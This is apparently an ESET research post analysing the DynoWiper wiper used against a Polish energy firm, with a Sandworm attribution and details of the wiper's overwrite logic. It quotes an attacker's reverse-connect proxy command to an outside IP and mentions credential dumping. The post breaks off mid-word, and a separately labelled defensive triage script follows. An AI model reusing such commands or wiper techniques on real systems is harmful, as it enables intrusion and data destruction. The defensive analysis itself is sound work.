ESET WeLiveSecurity | Attacks | HIGH

DynoWiper update: Technical analysis and attribution

ESET researchers have analyzed a recent data destruction incident in Poland's energy sector involving the DynoWiper malware. The analysis provides technical details about the wiper and its impact on the targeted organization.

In this blog post, we provide more technical details related to our previous DynoWiper publication.

Key points of the report:
- ESET researchers identified new data-wiping malware that we have named DynoWiper, used against an energy company in Poland.
- The tactics, techniques, and procedures (TTPs) observed during the DynoWiper incident closely resemble those seen earlier this year in an incident involving the ZOV wiper in Ukraine: Z, O, and V are Russian military symbols.
- We attribute DynoWiper to Sandworm with medium confidence, in contrast to the ZOV wiper, which we attribute to Sandworm with high confidence.

Sandworm profile

Sandworm is a Russia-aligned threat group that performs destructive attacks. It is mostly known for its attacks against Ukrainian energy companies in 2015-12 and 2016-12, which resulted in power outages. In 2017-06, Sandworm launched the NotPetya data-wiping attack, which used a supply-chain vector by compromising the Ukrainian accounting software M.E.Doc. In 2018-02, Sandworm launched the Olympic Destroyer data-wiping attack against organizers of the 2018 Winter Olympics in Pyeongchang. The Sandworm group uses such advanced malware as Industroyer, which is able to communicate with equipment at energy companies via industrial control protocols. In 2022-04, CERT-UA thwarted an attack against an energy company in Ukraine where the Sandworm group tried to deploy a new variant of this malware, Industroyer2. In 2020-10, the US Department of Justice published an indictment against six Russian computer hackers that it alleges prepared and conducted various Sandworm attacks. The group is commonly attributed to Unit 74455 of the Russian Main Intelligence Directorate (GRU).
History of Sandworm’s destructive operations

Sandworm is a threat actor known for conducting destructive cyberattacks, targeting a wide range of entities including government agencies, logistics companies, transportation firms, energy providers, media organizations, grain sector companies, and telecommunications companies. These attacks typically involve the deployment of wiper malware – malicious software designed to delete files, erase data, and render systems unbootable. Its operators have a long history of conducting such cyberattacks, and we have documented their activity extensively. In this blog post, we focus on their recent operations involving data-wiping malware.

To evade detection by security products, Sandworm often modifies the destructive malware it deploys – sometimes by introducing minor changes or by generating newly compiled variants from the original source code, and other times by abandoning a particular wiper altogether and switching to an entirely new malware family for its operations. We rarely see Sandworm attempt to deploy a destructive malware sample that was used in an earlier attack (for example, one with a known hash) or one that is already detected at the time of deployment.

Since February 2022, we have been thoroughly tracking incidents involving destructive malware and have publicly documented our findings in reports such as A year of wiper attacks in Ukraine. Over the years, Sandworm has deployed a wide range of destructive malware families, including, in roughly chronological order, HermeticWiper, HermeticRansom, CaddyWiper, DoubleZero, ARGUEPATCH, ORCSHRED, SOLOSHRED, AWFULSHRED, Prestige ransomware, RansomBoggs ransomware, SDelete-based wipers, BidSwipe, ROARBAT, SwiftSlicer, NikoWiper, SharpNikoWiper, ZEROLOT, Sting wiper, and ZOV wiper. It should be noted that some of these malware families were deployed multiple times across a number of incidents.
In 2025, ESET investigated more than 10 incidents involving destructive malware attributed to Sandworm, almost all of them occurring in Ukraine. We continuously enhance our products to improve early detection of Sandworm operations – ideally identifying activity before destructive wipers are deployed, and whenever possible preventing damage even when previously unknown destructive malware is executed. Because the majority of Sandworm’s cyberattacks currently target Ukraine, we collaborate closely with our Ukrainian partners, including the Computer Emergency Response Team of Ukraine (CERT-UA), to support both prevention and remediation efforts.

Besides Ukraine, Sandworm has a decade-long history of targeting companies in Poland, including those in the energy sector. Typically, these operations have been conducted covertly for cyberespionage purposes, as seen in the BlackEnergy and GreyEnergy cases. Notably, we detected the first deployment of GreyEnergy malware at a Polish energy company back in 2015. However, since the start of Russia’s full-scale invasion of Ukraine, Sandworm has changed its tactics regarding targets in Poland. Specifically, in October 2022, it carried out a destructive attack against logistics companies in both Ukraine and Poland, disguising the operation as a Prestige ransomware incident. Microsoft Threat Intelligence reported on the Prestige ransomware incidents, which it attributed to Seashell Blizzard (aka Sandworm). At ESET, we detected the Prestige ransomware family and publicly attributed this activity to Sandworm.

In December 2025, we detected the deployment of a destructive malware sample, which we named DynoWiper, at an energy company in Poland. The installed EDR/XDR product, ESET PROTECT, blocked execution of the wiper, significantly limiting its impact in the environment. In this blog post, we reveal additional details about this activity and outline our attribution process.
CERT Polska did an excellent job investigating the incident and published a detailed analysis in a report available on its website.

DynoWiper

On December 29th, 2025, DynoWiper samples were deployed to the C:\inetpub\pub\ directory, which is likely a shared directory in the victim’s domain, with the following filenames: schtask.exe, schtask2.exe, and <redacted>_update.exe. The schtask*.exe samples contain the PDB path C:\Users\vagrant\Documents\Visual Studio 2013\Projects\Source\Release\Source.pdb. The username vagrant corresponds to a tool called Vagrant, which can be used to manage virtual machines. This suggests that the machine that was used to build the wiper is a Vagrant box or, more likely, a host system that manages virtual machines using Vagrant. It is therefore possible that Sandworm operators first tested the operation on virtual machines before deploying the malware in the target organization.

The attackers initially deployed <redacted>_update.exe (PE timestamp: 2025-12-26 13:51:11). When this attempt failed, they modified the wiper code, built it, and then deployed schtask.exe (PE timestamp: 2025-12-29 13:17:06). This attempt also seems to have been unsuccessful, so they rebuilt the wiper with slightly modified code, resulting in schtask2.exe (PE timestamp: 2025-12-29 14:10:07). It is likely that even this final attempt failed. All three samples were deployed on the same day – December 29th, 2025. ESET PROTECT was installed on the targeted machines and appears to have interfered with the execution of all three variants.

DynoWiper’s workflow can be divided into three distinct phases, which are described later in the text. The schtask*.exe samples include only the first two phases and introduce a five-second delay between them. In contrast, <redacted>_update.exe implements all three phases and does not include the five-second delay.
The wiper overwrites files using a 16-byte buffer that contains random data generated once at the start of the wiper’s execution. Files of size 16 bytes or fewer are fully overwritten, with smaller files being extended to 16 bytes. To speed up the destruction process, other files (larger than 16 bytes) have only some parts of their contents overwritten.

During the first phase, the malware recursively wipes files on all removable and fixed drives, excluding the following directories (matched using a case-insensitive comparison):
- system32
- windows
- program files
- program files(x86) (note: a space is missing before the open bracket)
- temp
- recycle.bin
- $recycle.bin
- boot
- perflogs
- appdata
- documents and settings

For <redacted>_update.exe and schtask.exe, the second phase behaves similarly, but this time the previously excluded directories are not skipped in the root directory (e.g., C:\). As a result, a path like C:\Windows is no longer excluded, while C:\Windows\System32 still is. For schtask2.exe, in the second phase, all files and directories on removable and fixed drives are removed via the DeleteFileW API without skipping any directories, and without overwriting files.

The third phase forces the system to reboot, completing the destruction of the system.

Unlike Industroyer and Industroyer2, the discovered DynoWiper samples focus solely on the IT environment, with no observed functionality targeting OT (operational technology) industrial components. However, this does not exclude the possibility that such capabilities were present elsewhere in the attack chain.

Other tools deployed

We identified additional tools used within the same network prior to deployment of the wiper. In the early stages of the attack, the attackers attempted to download the publicly available Rubeus tool. The following path was used: c:\users\<USERNAME>\downloads\rubeus.exe. In early December 2025, the attackers attempted to dump the LSASS process using Windows Task Manager.
Additionally, they tried to download and launch a publicly available SOCKS5 proxy tool called rsocx. The attackers attempted to execute this proxy in reverse-connect mode using the command line C:\Users\<USERNAME>\Downloads\r.exe -r 31.172.71[.]5:8008. This server is used by ProGame (progamevl[.]ru), a programming school for kids in Vladivostok, Russia, and was likely compromised.

ZOV wiper

We identified several similarities to previously known destructive malware, specifically to the wiper we have named ZOV, which we attribute to Sandworm with high confidenc
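The overwrite behaviour described in the DynoWiper section above (one random 16-byte block generated per run; files of 16 bytes or fewer become exactly 16 bytes of that block; larger files keep the block somewhere inside them) gives incident responders a simple triage heuristic for telling wiped files from intact ones on a recovered volume. The script below is an added example, not ESET's or CERT Polska's code; the sample tree, its file names, and the assumption that a block shared by three or more 16-byte files is the wiper's buffer are constructed for illustration.

```python
import os
import tempfile
from collections import Counter

BLOCK_LEN = 16  # size of DynoWiper's random overwrite buffer (from the report)


def candidate_block(paths, min_hits=3):
    """Recover the likely 16-byte block. Heuristic assumed by this example: wiped files
    of <=16 bytes end up as exactly 16 bytes of the block, so the most frequent
    16-byte file content, when shared by min_hits or more files, is the block."""
    counts = Counter()
    for p in paths:
        if os.path.getsize(p) == BLOCK_LEN:
            with open(p, "rb") as f:
                counts[f.read()] += 1
    if not counts:
        return None
    block, hits = counts.most_common(1)[0]
    return block if hits >= min_hits else None


def triage(root, min_hits=3):
    """Return (block, affected); affected maps each hit path to 'full' or 'partial'."""
    paths = [os.path.join(d, n) for d, _dirs, names in os.walk(root) for n in names]
    block = candidate_block(paths, min_hits)
    affected = {}
    if block is not None:
        for p in paths:
            with open(p, "rb") as f:
                data = f.read()
            if data == block:
                affected[p] = "full"
            elif block in data:  # an accidental match of a random 16-byte block is negligible
                affected[p] = "partial"
    return block, affected


def build_sample_tree():
    """Constructed sample data, not from the incident: three wiped small files, one
    partially overwritten larger file and one intact file in a temp directory."""
    root = tempfile.mkdtemp(prefix="dynowiper_triage_")
    block = bytes(range(0xA0, 0xA0 + BLOCK_LEN))  # stands in for the random buffer
    files = {"a.txt": block, "b.ini": block, "c.log": block,
             "report.docx": b"Q" * 64 + block + b"Q" * 120,  # only partly overwritten
             "intact.txt": b"untouched content"}
    for name, data in files.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(data)
    return root, block
```

Running triage() on an image of a wiped share lists the files still worth attempting to recover (those not in affected), and the recovered block doubles as a per-incident signature for the run that produced it.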
